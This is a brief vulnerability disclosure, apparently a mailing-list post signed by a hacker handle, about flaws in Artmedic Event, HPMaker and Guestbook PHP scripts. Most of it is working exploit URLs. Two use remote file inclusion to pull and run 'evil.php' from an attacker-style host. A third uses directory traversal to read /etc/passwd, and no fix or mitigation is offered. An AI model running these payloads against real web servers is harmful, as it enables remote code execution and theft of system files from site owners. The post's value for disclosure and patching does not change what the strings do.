Some Scripts of www.artmedic.de are vulnerable. Remote Code Execution in Artmedic Event and Artmedic HPMaker: You can execute php scripts on the webserver. Artmedic Event: http://target.de/event/index.php?page=http://h4x0rhost.de/evil.php Artmedic HPMaker: http://target.de/hp-maker/index.php?p=http://h4x0rhost.de/evil.php Directory Traversal in Artmedic Guestbook: http://target.de/artmedic_guestbook/index.php?id=/etc/passwd Zero X, member of www.Lostkey.org and www.Lobnan.de